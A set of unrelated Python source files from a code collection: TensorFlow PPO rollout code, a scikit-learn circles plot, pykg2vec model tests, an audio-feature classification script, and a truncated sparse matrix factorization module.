**collect_kwargs))
return (train_summary, eval_collect_summary, (train_initialization,
eval_initialization))
else:
return (train_summary, None, (train_initialization,))
def _run_train(ppo_hparams,
event_dir,
model_dir,
restarter,
train_summary_op,
eval_summary_op,
initializers,
epoch,
report_fn=None,
model_save_fn=None):
"""Train."""
summary_writer = tf.summary.FileWriter(
event_dir, graph=tf.get_default_graph(), flush_secs=60)
model_saver = tf.train.Saver(
tf.global_variables(ppo_hparams.policy_network + "/.*") +
tf.global_variables("training/" + ppo_hparams.policy_network + "/.*") +
# tf.global_variables("clean_scope.*") + # Needed for sharing params.
tf.global_variables("global_step") +
tf.global_variables("losses_avg.*") +
tf.global_variables("train_stats.*")
)
global_step = tf.train.get_or_create_global_step()
with tf.control_dependencies([tf.assign_add(global_step, 1)]):
train_summary_op = tf.identity(train_summary_op)
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
for initializer in initializers:
initializer(sess)
trainer_lib.restore_checkpoint(model_dir, model_saver, sess)
num_target_iterations = restarter.target_local_step
num_completed_iterations = num_target_iterations - restarter.steps_to_go
with restarter.training_loop():
for epoch_index in range(num_completed_iterations, num_target_iterations):
summary = sess.run(train_summary_op)
if summary_writer:
summary_writer.add_summary(summary, epoch_index)
if (ppo_hparams.eval_every_epochs and
epoch_index % ppo_hparams.eval_every_epochs == 0):
eval_summary = sess.run(eval_summary_op)
if summary_writer:
summary_writer.add_summary(eval_summary, epoch_index)
if report_fn:
summary_proto = tf.Summary()
summary_proto.ParseFromString(eval_summary)
for elem in summary_proto.value:
if "mean_score" in elem.tag:
report_fn(elem.simple_value, epoch_index)
break
if (model_saver and ppo_hparams.save_models_every_epochs and
(epoch_index % ppo_hparams.save_models_every_epochs == 0 or
(epoch_index + 1) == num_target_iterations)):
ckpt_name = "model.ckpt-{}".format(
tf.train.global_step(sess, global_step)
)
# Keep the last checkpoint from each epoch in a separate directory.
epoch_dir = os.path.join(model_dir, "epoch_{}".format(epoch))
tf.gfile.MakeDirs(epoch_dir)
for ckpt_dir in (model_dir, epoch_dir):
model_saver.save(sess, os.path.join(ckpt_dir, ckpt_name))
if model_save_fn:
model_save_fn(model_dir)
def _rollout_metadata(batch_env, distributional_size=1):
"""Metadata for rollouts."""
batch_env_shape = batch_env.observ.get_shape().as_list()
batch_size = [batch_env_shape[0]]
value_size = batch_size
if distributional_size > 1:
value_size = batch_size + [distributional_size]
shapes_types_names = [
# TODO(piotrmilos): possibly retrieve the observation type for batch_env
(batch_size + batch_env_shape[1:], batch_env.observ_dtype, "observation"),
(batch_size, tf.float32, "reward"),
(batch_size, tf.bool, "done"),
(batch_size + list(batch_env.action_shape), batch_env.action_dtype,
"action"),
(batch_size, tf.float32, "pdf"),
(value_size, tf.float32, "value_function"),
]
return shapes_types_names
class _MemoryWrapper(WrapperBase):
"""Memory wrapper."""
def __init__(self, batch_env):
super(_MemoryWrapper, self).__init__(batch_env)
infinity = 10000000
meta_data = list(zip(*_rollout_metadata(batch_env)))
# In memory wrapper we do not collect pdfs neither value_function
# thus we only need the first 4 entries of meta_data
shapes = meta_data[0][:4]
dtypes = meta_data[1][:4]
self.speculum = tf.FIFOQueue(infinity, shapes=shapes, dtypes=dtypes)
observs_shape = batch_env.observ.shape
# TODO(piotrmilos): possibly retrieve the observation type for batch_env
self._observ = tf.Variable(
tf.zeros(observs_shape, self.observ_dtype), trainable=False)
def __str__(self):
return "MemoryWrapper(%s)" % str(self._batch_env)
def simulate(self, action):
# There is subtlety here. We need to collect data
# obs, action = policy(obs), done, reward = env(abs, action)
# Thus we need to enqueue data before assigning new observation
reward, done = self._batch_env.simulate(action)
with tf.control_dependencies([reward, done]):
enqueue_op = self.speculum.enqueue(
[self._observ.read_value(), reward, done, action])
with tf.control_dependencies([enqueue_op]):
assign = self._observ.assign(self._batch_env.observ)
with tf.control_dependencies([assign]):
return tf.identity(reward), tf.identity(done)
def _define_collect(batch_env, ppo_hparams, scope, frame_stack_size, eval_phase,
sampling_temp, force_beginning_resets,
distributional_size=1):
"""Collect trajectories.
Args:
batch_env: Batch environment.
ppo_hparams: PPO hparams, defined in tensor2tensor.models.research.rl.
scope: var scope.
frame_stack_size: Number of last observations to feed into the policy.
eval_phase: TODO(koz4k): Write docstring.
sampling_temp: Sampling temperature for the policy.
force_beginning_resets: Whether to reset at the beginning of each episode.
distributional_size: optional, number of buckets in distributional RL.
Returns:
Returns memory (observations, rewards, dones, actions,
pdfs, values_functions)
containing a rollout of environment from nested wrapped structure.
"""
epoch_length = ppo_hparams.epoch_length
to_initialize = []
with tf.variable_scope(scope, reuse=tf.AUTO_REUSE):
num_agents = batch_env.batch_size
to_initialize.append(batch_env)
wrappers = [(StackWrapper, {
"history": frame_stack_size
}), (_MemoryWrapper, {})]
rollout_metadata = None
speculum = None
for w in wrappers:
tf.logging.info("Applying wrapper %s(%s) to env %s." % (str(
w[0]), str(w[1]), str(batch_env)))
batch_env = w[0](batch_env, **w[1])
to_initialize.append(batch_env)
rollout_metadata = _rollout_metadata(batch_env, distributional_size)
speculum = batch_env.speculum
def initialization_lambda(sess):
for batch_env in to_initialize:
batch_env.initialize(sess)
memory = [
tf.get_variable( # pylint: disable=g-complex-comprehension
"collect_memory_%d_%s" % (epoch_length, name),
shape=[epoch_length] + shape,
dtype=dtype,
initializer=tf.zeros_initializer(),
trainable=False) for (shape, dtype, name) in rollout_metadata
]
cumulative_rewards = tf.get_variable(
"cumulative_rewards", len(batch_env), trainable=False)
eval_phase_t = tf.convert_to_tensor(eval_phase)
should_reset_var = tf.Variable(True, trainable=False)
zeros_tensor = tf.zeros(len(batch_env))
force_beginning_resets = tf.convert_to_tensor(force_beginning_resets)
def reset_ops_group():
return tf.group(
batch_env.reset(tf.range(len(batch_env))),
tf.assign(cumulative_rewards, zeros_tensor))
reset_op = tf.cond(
tf.logical_or(should_reset_var.read_value(), force_beginning_resets),
reset_ops_group, tf.no_op)
with tf.control_dependencies([reset_op]):
reset_once_op = tf.assign(should_reset_var, False)
with tf.control_dependencies([reset_once_op]):
def step(index, scores_sum, scores_num):
"""Single step."""
index %= epoch_length # Only needed in eval runs.
# Note - the only way to ensure making a copy of tensor is to run simple
# operation. We are waiting for tf.copy:
# https://github.com/tensorflow/tensorflow/issues/11186
obs_copy = batch_env.observ + 0
value_fun_shape = (num_agents,)
if distributional_size > 1:
value_fun_shape = (num_agents, distributional_size)
def env_step(arg1, arg2, arg3): # pylint: disable=unused-argument
"""Step of the environment."""
(logits, value_function) = get_policy(
obs_copy, ppo_hparams, batch_env.action_space, distributional_size
)
action = common_layers.sample_with_temperature(logits, sampling_temp)
action = tf.cast(action, tf.int32)
action = tf.reshape(action, shape=(num_agents,))
reward, done = batch_env.simulate(action)
pdf = tfp.distributions.Categorical(logits=logits).prob(action)
pdf = tf.reshape(pdf, shape=(num_agents,))
value_function = tf.reshape(value_function, shape=value_fun_shape)
done = tf.reshape(done, shape=(num_agents,))
with tf.control_dependencies([reward, done]):
return tf.identity(pdf), tf.identity(value_function), \
tf.identity(done)
# TODO(piotrmilos): while_body is executed at most once,
# thus should be replaced with tf.cond
pdf, value_function, top_level_done = tf.while_loop(
lambda _1, _2, _3: tf.equal(speculum.size(), 0),
env_step,
[
tf.constant(0.0, shape=(num_agents,)),
tf.constant(0.0, shape=value_fun_shape),
tf.constant(False, shape=(num_agents,))
],
parallel_iterations=1,
back_prop=False,
)
with tf.control_dependencies([pdf, value_function]):
obs, reward, done, action = speculum.dequeue()
to_save = [obs, reward, done, action, pdf, value_function]
save_ops = [
tf.scatter_update(memory_slot, index, value)
for memory_slot, value in zip(memory, to_save)
]
cumulate_rewards_op = cumulative_rewards.assign_add(reward)
agent_indices_to_reset = tf.where(top_level_done)[:, 0]
with tf.control_dependencies([cumulate_rewards_op]):
# TODO(piotrmilos): possibly we need cumulative_rewards.read_value()
scores_sum_delta = tf.reduce_sum(
tf.gather(cumulative_rewards.read_value(), agent_indices_to_reset))
scores_num_delta = tf.count_nonzero(done, dtype=tf.int32)
with tf.control_dependencies(save_ops +
[scores_sum_delta, scores_num_delta]):
reset_env_op = batch_env.reset(agent_indices_to_reset)
reset_cumulative_rewards_op = tf.scatter_update(
cumulative_rewards, agent_indices_to_reset,
tf.gather(zeros_tensor, agent_indices_to_reset))
with tf.control_dependencies([reset_env_op, reset_cumulative_rewards_op]):
return [
index + 1, scores_sum + scores_sum_delta,
scores_num + scores_num_delta
]
def stop_condition(i, _, resets):
return tf.cond(eval_phase_t, lambda: resets < num_agents,
lambda: i < epoch_length)
init = [tf.constant(0), tf.constant(0.0), tf.constant(0)]
index, scores_sum, scores_num = tf.while_loop(
stop_condition, step, init, parallel_iterations=1, back_prop=False)
# We handle force_beginning_resets differently. We assume that all envs are
# reseted at the end of episod (though it happens at the beginning of the
# next one
scores_num = tf.cond(force_beginning_resets,
lambda: scores_num + len(batch_env), lambda: scores_num)
with tf.control_dependencies([scores_sum]):
scores_sum = tf.cond(
force_beginning_resets,
lambda: scores_sum + tf.reduce_sum(cumulative_rewards.read_value()),
lambda: scores_sum)
mean_score = tf.cond(
tf.greater(scores_num, 0),
lambda: scores_sum / tf.cast(scores_num, tf.float32), lambda: 0.)
printing = tf.Print(0, [mean_score, scores_sum, scores_num], "mean_score: ")
with tf.control_dependencies([index, printing]):
memory = [mem.read_value() for mem in memory]
# When generating real data together with PPO training we must use single
# agent. For PPO to work we reshape the history, as if it was generated
# by real_ppo_effective_num_agents.
if ppo_hparams.effective_num_agents is not None and not eval_phase:
new_memory = []
effective_num_agents = ppo_hparams.effective_num_agents
assert epoch_length % ppo_hparams.effective_num_agents == 0, (
"The rollout of ppo_hparams.epoch_length will be distributed amongst"
"effective_num_agents of agents")
new_epoch_length = int(epoch_length / effective_num_agents)
for mem, info in zip(memory, rollout_metadata):
shape, _, name = info
new_shape = [effective_num_agents, new_epoch_length] + shape[1:]
perm = list(range(len(shape) + 1))
perm[0] = 1
perm[1] = 0
mem = tf.transpose(mem, perm=perm)
mem = tf.reshape(mem, shape=new_shape)
mem = tf.transpose(
mem,
perm=perm,
name="collect_memory_%d_%s" % (new_epoch_length, name))
new_memory.append(mem)
memory = new_memory
with tf.variable_scope(scope, reuse=tf.AUTO_REUSE):
mean_score_summary = tf.cond(
tf.greater(scores_num, 0),
lambda: tf.summary.scalar("mean_score_this_iter", mean_score), str)
summaries = tf.summary.merge([
mean_score_summary,
tf.summary.scalar("episodes_finished_this_iter", scores_num)
])
return memory, summaries, initialization_lambda
|
the-stack_106_14827
|
import matplotlib.pyplot as plt
from sklearn import datasets
from mpl_toolkits.mplot3d import Axes3D
x_data, y_data = datasets.make_circles(n_samples=500, factor=.3, noise=.10)
plt.scatter(x_data[:,0], x_data[:,1], c=y_data)
plt.show()
z_data = x_data[:,0]**2 + x_data[:,1]**2
ax = plt.figure().add_subplot(111, projection = '3d')
ax.scatter(x_data[:,0], x_data[:,1], z_data, c = y_data, s = 10) #点为红色三角形
#显示图像
plt.show()
|
the-stack_106_14828
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
This module is for testing unit functions of model
"""
import pytest
from pykg2vec.common import KGEArgParser, Importer
from pykg2vec.utils.trainer import Trainer
from pykg2vec.data.kgcontroller import KnowledgeGraph
@pytest.mark.parametrize("model_name", [
'analogy',
'complex',
'complexn3',
'conve',
'convkb',
'cp',
'distmult',
'hyper',
'hole',
'interacte',
'kg2e',
'murp',
'ntn',
'octonione',
'proje_pointwise',
'quate',
'rescal',
'rotate',
'simple',
'simple_ignr',
'slm',
'sme',
'sme_bl',
'transe',
'transh',
'transr',
'transd',
'transm',
])
def test_kge_methods(model_name):
"""Function to test a set of KGE algorithsm."""
testing_function(model_name)
def test_error_on_importing_model():
with pytest.raises(ValueError) as e:
Importer().import_model_config("unknown")
assert "unknown model has not been implemented. please select from" in str(e)
@pytest.mark.skip(reason="This is a functional method.")
def testing_function(name):
"""Function to test the models with arguments."""
# getting the customized configurations from the command-line arguments.
args = KGEArgParser().get_args(['-exp', 'True'])
# Preparing data and cache the data for later usage
knowledge_graph = KnowledgeGraph(dataset=args.dataset_name)
knowledge_graph.prepare_data()
# Extracting the corresponding model config and definition from Importer().
config_def, model_def = Importer().import_model_config(name)
config = config_def(args)
config.epochs = 1
config.test_step = 1
config.test_num = 10
config.save_model = False
config.debug = True
config.ent_hidden_size = 10
config.rel_hidden_size = 10
config.channels = 2
model = model_def(**config.__dict__)
# Create, Compile and Train the model. While training, several evaluation will be performed.
trainer = Trainer(model, config)
trainer.build_model()
trainer.train_model()
|
the-stack_106_14830
|
import csv
import os
import librosa.display
import numpy as np
import pandas as pd
from sklearn.preprocessing import StandardScaler
from sklearn.tree import DecisionTreeClassifier
from sklearn.utils import shuffle
from sklearn.model_selection import KFold
from sklearn.neighbors import KNeighborsClassifier
from sklearn.model_selection import cross_val_score
from sklearn.linear_model import Perceptron
from sklearn.svm import SVC
from sklearn.ensemble import GradientBoostingClassifier
from sklearn.ensemble import RandomForestClassifier
def normalize_duration(full_song_name, minimum_duration):
y, sr = librosa.load(full_song_name, sr=22050, mono=True)
file_duration = librosa.get_duration(y, sr)
delta = file_duration - minimum_duration
y_new, sr = librosa.load(full_song_name, sr=22050, mono=True, offset=delta / 2, duration=minimum_duration)
return y_new, sr
def create_train_csv():
header = 'class song_filename chroma_stft rms spectral_centroid spectral_bandwidth rolloff zero_crossing_rate'
for i in range(1, 21):
header += f' mfcc{i}'
header = header.split()
file = open(dataset_train_file, 'w', newline='')
with file:
writer = csv.writer(file)
writer.writerow(header)
def create_test_csv():
header = 'song_filename chroma_stft rms spectral_centroid spectral_bandwidth rolloff zero_crossing_rate'
for i in range(1, 21):
header += f' mfcc{i}'
header = header.split()
file = open(dataset_test_file, 'w', newline='')
with file:
writer = csv.writer(file)
writer.writerow(header)
def create_results_csvs():
header = 'Filename Predict Probability'
header = header.split()
file_names = [result_file_dtc, result_file_neigh, result_file_svc, result_file_rfc, result_file_gbc]
for file_name in file_names:
file = open(file_name, 'w', newline='')
with file:
writer = csv.writer(file)
writer.writerow(header)
def train_to_csv():
print('\nTrain split of songs:')
for class_ in classes:
for song_filename in os.listdir(path_to_root + dataset_train_folder + f'\\{class_}'):
full_song_name = path_to_root + dataset_train_folder + f'\\{class_}\\{song_filename}'
# y, sr = normalize_duration(full_song_name, minimum_duration)
y, sr = librosa.load(full_song_name, sr=22050, mono=True)
print('Class: ' + class_ + '; Song filename: ' + song_filename + '; Duration: ' + str(librosa.get_duration(y)))
chroma_stft, rms, spec_cent, spec_bw, rolloff, zcr, mfcc = create_features(y, sr)
output_train_to_csv(class_, song_filename, chroma_stft, rms, spec_cent, spec_bw, rolloff, zcr, mfcc)
print('---------------')
print('Features successful created and outputed at dataset_train.csv')
def test_to_csv():
print('\nTest split of songs:')
for song_filename in os.listdir(path_to_root + dataset_test_folder):
full_song_name = path_to_root + dataset_test_folder + f'\\{song_filename}'
# y, sr = normalize_duration(full_song_name, minimum_duration)
y, sr = librosa.load(full_song_name, sr=22050, mono=True)
print('Song filename: ' + song_filename + '; Duration: ' + str(librosa.get_duration(y)))
chroma_stft, rms, spec_cent, spec_bw, rolloff, zcr, mfcc = create_features(y, sr)
output_test_to_csv(song_filename, chroma_stft, rms, spec_cent, spec_bw, rolloff, zcr, mfcc)
print('---------------')
print('Features successful created and outputed at dataset_test.csv\n')
def create_features(y, sr):
chroma_stft = librosa.feature.chroma_stft(y=y, sr=sr)
rms = librosa.feature.rms(y=y)
spec_cent = librosa.feature.spectral_centroid(y=y, sr=sr)
spec_bw = librosa.feature.spectral_bandwidth(y=y, sr=sr)
rolloff = librosa.feature.spectral_rolloff(y=y, sr=sr)
zcr = librosa.feature.zero_crossing_rate(y)
mfcc = librosa.feature.mfcc(y=y, sr=sr)
return chroma_stft, rms, spec_cent, spec_bw, rolloff, zcr, mfcc
def output_train_to_csv(class_, song_filename, chroma_stft, rms, spec_cent, spec_bw, rolloff, zcr, mfcc):
to_append = f'{class_} {song_filename} {np.mean(chroma_stft)} {np.mean(rms)} {np.mean(spec_cent)} {np.mean(spec_bw)} {np.mean(rolloff)} {np.mean(zcr)}'
for i in mfcc:
to_append += f' {np.mean(i)}'
to_append = to_append.split()
file = open(dataset_train_file, 'a', newline='')
with file:
writer = csv.writer(file)
writer.writerow(to_append)
def output_test_to_csv(song_filename, chroma_stft, rms, spec_cent, spec_bw, rolloff, zcr, mfcc):
to_append = f'{song_filename} {np.mean(chroma_stft)} {np.mean(rms)} {np.mean(spec_cent)} {np.mean(spec_bw)} {np.mean(rolloff)} {np.mean(zcr)}'
for i in mfcc:
to_append += f' {np.mean(i)}'
to_append = to_append.split()
file = open(dataset_test_file, 'a', newline='')
with file:
writer = csv.writer(file)
writer.writerow(to_append)
def output_results_to_csvs():
results = [result_dtc, result_neigh, result_svc, result_rfc, result_gbc]
file_names = [result_file_dtc, result_file_neigh, result_file_svc, result_file_rfc, result_file_gbc]
for i in range(len(results)):
result = results[i]
result_file = file_names[i]
for i in range(len(result[0])):
to_append = f'{result[0][i]} {result[1][i]} {result[2][i]}'
to_append = to_append.split()
file = open(result_file, 'a', newline='')
with file:
writer = csv.writer(file)
writer.writerow(to_append)
def output_results_to_console():
results = [result_dtc, result_neigh, result_svc, result_rfc, result_gbc]
dict = {0:'DecisionTree', 1:'kNeighbors', 2:'SVC', 3:'RandomForest', 4:'GradientBoosting'}
for i in range(len(results)):
result = results[i]
print('\n Result - ' + dict[i] + ':')
prob_counter = [0, 0, 0, 0, 0]
sum_probabilities = 0
for i in range(len(result[0])):
print('Filename: ' + str(result[0][i]) + '; Predict: ' + str(result[1][i]) + '; Probability: ' + str(
result[2][i]))
if 0.0 <= result[2][i] < 0.2:
prob_counter[0] += 1
elif 0.2 <= result[2][i] < 0.4:
prob_counter[1] += 1
elif 0.4 <= result[2][i] < 0.6:
prob_counter[2] += 1
elif 0.6 <= result[2][i] < 0.8:
prob_counter[3] += 1
elif 0.8 <= result[2][i] <= 1.0:
prob_counter[4] += 1
sum_probabilities += result[2][i]
# print('Sum of probabilities: ' + str(sum_probabilities))
print('Mean of probabilities: ' + str(sum_probabilities / len(result[0])))
print('Counters: ')
print('[0-20): ' + str(prob_counter[0]) + '; (' + str(round(prob_counter[0]/len(result[0]), 2)) + '%)')
print('[20-40): ' + str(prob_counter[1]) + '; (' + str(round(prob_counter[1]/len(result[0]), 2)) + '%)')
print('[40-60): ' + str(prob_counter[2]) + '; (' + str(round(prob_counter[2]/len(result[0]), 2)) + '%)')
print('[60-80): ' + str(prob_counter[3]) + '; (' + str(round(prob_counter[3]/len(result[0]), 2)) + '%)')
print('[80-100]: ' + str(prob_counter[4]) + '; (' + str(round(prob_counter[4]/len(result[0]), 2)) + '%)')
print('All: ' + str(len(result[0])))
def read_dataset_train_from_csv():
dataset_train = pd.read_csv(dataset_train_file)
# dataset_train = shuffle(dataset_train)
X_train = dataset_train.drop(['class', 'song_filename'], axis=1)
y_train = dataset_train['class']
return X_train, y_train
def read_dataset_test_from_csv():
dataset_test = pd.read_csv(dataset_test_file)
X_test = dataset_test.drop(['song_filename'], axis=1)
filenames_test = dataset_test['song_filename']
return X_test, filenames_test
def learn_by_DecisionTreeClassifier(X_train_scl, y_train, X_test_scl):
print('DecisionTree:')
# kf = KFold(n_splits=5, shuffle=True)
dtc = DecisionTreeClassifier()
# print('[MESSAGE]: Please, wait! Start cross-validation...')
# quality = cross_val_score(dtc, X_train_scl, y_train, cv=kf, scoring='accuracy')
# print('[MESSAGE]: Cross-validation finished successfully!')
# print('Quality: ' + str(quality))
print('[MESSAGE]: Please, wait! Start learning by DecisionTree...')
dtc.fit(X_train_scl, y_train)
print('[MESSAGE]: Learning finished successfully!')
y_test = dtc.predict(X_test_scl)
print('Predict: ' + str(y_test) + '\n')
probabilities = get_probabilities_for_predict(X_test_scl, y_test, dtc)
return y_test, probabilities
def learn_by_kNeighborsClassifier(X_train_scl, y_train, X_test_scl):
print('kNeighbors:')
# kf = KFold(n_splits=5, shuffle=True)
neigh = KNeighborsClassifier(n_neighbors=2)
# print('[MESSAGE]: Please, wait! Start cross-validation...')
# quality = cross_val_score(neigh, X_train_scl, y_train, cv=kf, scoring='accuracy')
# print('[MESSAGE]: Cross-validation finished successfully!')
# print('Quality: ' + str(quality))
print('[MESSAGE]: Please, wait! Start learning by kNeighbors...')
neigh.fit(X_train_scl, y_train)
print('[MESSAGE]: Learning finished successfully!')
y_test = neigh.predict(X_test_scl)
print('Predict: ' + str(y_test) + '\n')
probabilities = get_probabilities_for_predict(X_test_scl, y_test, neigh)
return y_test, probabilities
def learn_by_SVC(X_train_scl, y_train, X_test_scl):
print('SVC:')
# kf = KFold(n_splits=5, shuffle=True)
svc = SVC(C=10.0, probability=True)
# print('[MESSAGE]: Please, wait! Start cross-validation...')
# quality = cross_val_score(svc, X_train_scl, y_train, cv=kf, scoring='accuracy')
# print('[MESSAGE]: Cross-validation finished successfully!')
# print('Quality: ' + str(quality))
print('[MESSAGE]: Please, wait! Start learning by SVC...')
svc.fit(X_train_scl, y_train)
print('[MESSAGE]: Learning finished successfully!')
y_test = svc.predict(X_test_scl)
print('Predict: ' + str(y_test) + '\n')
probabilities = get_probabilities_for_predict(X_test_scl, y_test, svc)
return y_test, probabilities
def learn_by_RandomForestClassifier(X_train_scl, y_train, X_test_scl):
print('RandomForest:')
# kf = KFold(n_splits=5, shuffle=True)
rfc = RandomForestClassifier(n_estimators=150)
# print('[MESSAGE]: Please, wait! Start cross-validation...')
# quality = cross_val_score(rfc, X_train_scl, y_train, cv=kf, scoring='accuracy')
# print('[MESSAGE]: Cross-validation finished successfully!')
# print('Quality: ' + str(quality))
print('[MESSAGE]: Please, wait! Start learning by RandomForest...')
rfc.fit(X_train_scl, y_train)
print('[MESSAGE]: Learning finished successfully!')
y_test = rfc.predict(X_test_scl)
print('Predict: ' + str(y_test) + '\n')
probabilities = get_probabilities_for_predict(X_test_scl, y_test, rfc)
return y_test, probabilities
def learn_by_GradientBoostingClassifier(X_train_scl, y_train, X_test_scl):
print('GradientBoosting:')
# kf = KFold(n_splits=5, shuffle=True)
gbc = GradientBoostingClassifier(n_estimators=150, learning_rate=0.2)
# print('[MESSAGE]: Please, wait! Start cross-validation...')
# quality = cross_val_score(gbc, X_train_scl, y_train, cv=kf, scoring='accuracy')
# print('[MESSAGE]: Cross-validation finished successfully!')
# print('Quality: ' + str(quality))
print('[MESSAGE]: Please, wait! Start learning by GradientBoosting...')
gbc.fit(X_train_scl, y_train)
print('[MESSAGE]: Learning finished successfully!')
y_test = gbc.predict(X_test_scl)
print('Predict: ' + str(y_test) + '\n')
probabilities = get_probabilities_for_predict(X_test_scl, y_test, gbc)
return y_test, probabilities
def get_probabilities_for_predict(X_test_scl, y_test, clf):
predict_proba = clf.predict_proba(X_test_scl)
probabilities = []
if type(y_test[0]) == type(''):
dict = {'1_':1, '2_':2, '3_':3, '4_':4, '5_':5}
for i in range(len(y_test)):
y_test[i] = dict[y_test[i]]
for i, predict in enumerate(y_test):
probabilities.append(predict_proba[i][predict - 1])
return probabilities
path_to_root = str(os.getcwd()) + '\\'
dataset_train_file = path_to_root + 'datasets\\' + 'dataset_train.csv'
dataset_test_file = path_to_root + 'datasets\\' + 'dataset_test.csv'
# dataset_train_file = path_to_root + 'datasets\\' + 'dataset_norm_train.csv'
# dataset_test_file = path_to_root + 'datasets\\' + 'dataset_norm_test.csv'
# dataset_train_file = path_to_root + 'datasets\\' + 'dataset1_train.csv'
# dataset_test_file = path_to_root + 'datasets\\' + 'dataset1_test.csv'
# dataset_train_file = path_to_root + 'datasets\\' + 'dataset1_norm_train.csv'
# dataset_test_file = path_to_root + 'datasets\\' + 'dataset1_norm_test.csv'
result_file_dtc = path_to_root + 'results\\' + 'result_dtc.csv'
result_file_neigh = path_to_root + 'results\\' + 'result_neigh.csv'
result_file_svc = path_to_root + 'results\\' + 'result_svc.csv'
result_file_rfc = path_to_root + 'results\\' + 'result_rfc.csv'
result_file_gbc = path_to_root + 'results\\' + 'result_gbc.csv'
# result_file_dtc = path_to_root + 'results\\' + 'result_norm_dtc.csv'
# result_file_neigh = path_to_root + 'results\\' + 'result_norm_neigh.csv'
# result_file_svc = path_to_root + 'results\\' + 'result_norm_svc.csv'
# result_file_rfc = path_to_root + 'results\\' + 'result_norm_rfc.csv'
# result_file_gbc = path_to_root + 'results\\' + 'result_norm_gbc.csv'
# result_file_dtc = path_to_root + 'results\\' + 'result1_dtc.csv'
# result_file_neigh = path_to_root + 'results\\' + 'result1_neigh.csv'
# result_file_svc = path_to_root + 'results\\' + 'result1_svc.csv'
# result_file_rfc = path_to_root + 'results\\' + 'result1_rfc.csv'
# result_file_gbc = path_to_root + 'results\\' + 'result1_gbc.csv'
# result_file_dtc = path_to_root + 'results\\' + 'result1_norm_dtc.csv'
# result_file_neigh = path_to_root + 'results\\' + 'result1_norm_neigh.csv'
# result_file_svc = path_to_root + 'results\\' + 'result1_norm_svc.csv'
# result_file_rfc = path_to_root + 'results\\' + 'result1_norm_rfc.csv'
# result_file_gbc = path_to_root + 'results\\' + 'result1_norm_gbc.csv'
classes = '1 2 3 4 5'.split()
# minimum_duration = 2.9
dataset_train_folder = 'train_data'
dataset_test_folder = 'test_data'
create_train_csv()
train_to_csv()
X_train, y_train = read_dataset_train_from_csv()
scale = StandardScaler()
X_train_scl = scale.fit_transform(X_train)
create_test_csv()
test_to_csv()
X_test, filenames_test = read_dataset_test_from_csv()
print('\nX_test:')
print(X_test)
print('------------------')
X_test_scl = scale.transform(X_test)
y_test_dtc, probabilities_dtc = learn_by_DecisionTreeClassifier(X_train_scl, y_train, X_test_scl)
y_test_neigh, probabilities_neigh = learn_by_kNeighborsClassifier(X_train_scl, y_train, X_test_scl)
y_test_svc, probabilities_svc = learn_by_SVC(X_train_scl, y_train, X_test_scl)
y_test_rfc, probabilities_rfc = learn_by_RandomForestClassifier(X_train_scl, y_train, X_test_scl)
y_test_gbc, probabilities_gbc = learn_by_GradientBoostingClassifier(X_train_scl, y_train, X_test_scl)
result_dtc = [filenames_test, y_test_dtc, probabilities_dtc]
result_neigh = [filenames_test, y_test_neigh, probabilities_neigh]
result_svc = [filenames_test, y_test_svc, probabilities_svc]
result_rfc = [filenames_test, y_test_rfc, probabilities_rfc]
result_gbc = [filenames_test, y_test_gbc, probabilities_gbc]
output_results_to_console()
create_results_csvs()
output_results_to_csvs()
|
the-stack_106_14831
|
# BSD 3-Clause License
#
# Copyright (c) 2022, ZHENG Leon
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import numpy as np
import src.tree
from src import utils as utils
def retrieveCEC(support1, support2):
"""
Partition the support to equivalent classes
"""
assert (support1.shape[1] == support2.shape[0])
r = support1.shape[1]
list_supp = []
cec = []
noncec = []
for i in range(r):
list_supp.append(list(support1[:, i]) + list(support2[i]))
order = sorted(range(len(list_supp)), key=list_supp.__getitem__)
index = 0
while index < r:
curr = [order[index]]
i = index + 1
while (i < r and (support1[:, order[i]] == support1[:, order[index]]).all() and (
support2[order[i]] == support2[order[index]]).all()):
curr.append(order[i])
i += 1
if min(np.sum(support1[:, order[index]]), np.sum(support2[order[index]])) <= len(curr):
cec.append(curr)
else:
noncec.append(curr)
index = i
return cec, noncec
def best_low_rank(A, rank):
"""
Finding the best low rank approximation by SVD
"""
u, s, vh = np.linalg.svd(A)
s = np.sqrt(s[:rank])
return u[:, range(rank)] @ np.diag(s), np.diag(s) @ vh[range(rank)]
def solve_DTO(support1, support2, A, type = 'complex'):
"""
Algorithm 1
:param support1: numpy array, binary matrix
:param support2: numpy array, binary matrix
:param A: numpy array
:return: X, Y numpy arrays
"""
cec, noncec = retrieveCEC(support1, support2)
if type == 'complex':
X = np.zeros(support1.shape).astype(np.complex128)
Y = np.zeros(support2.shape).astype(np.complex128)
else:
X = np.zeros(support1.shape)
Y = np.zeros(support2.shape)
for ce in cec:
rep = ce[0]
if np.sum(support1[:, rep]) == 0 or np.sum(support2[rep]) == 0:
continue
RP = np.where(support1[:, rep] == 1)[0]
CP = np.where(support2[rep] == 1)[0]
if len(ce) == len(RP) or len(ce) == len(RP):
noncec.append(ce)
continue
submatrixA = A[RP][:, CP]
if len(ce) >= len(RP):
colx, rowx = np.meshgrid(ce, RP)
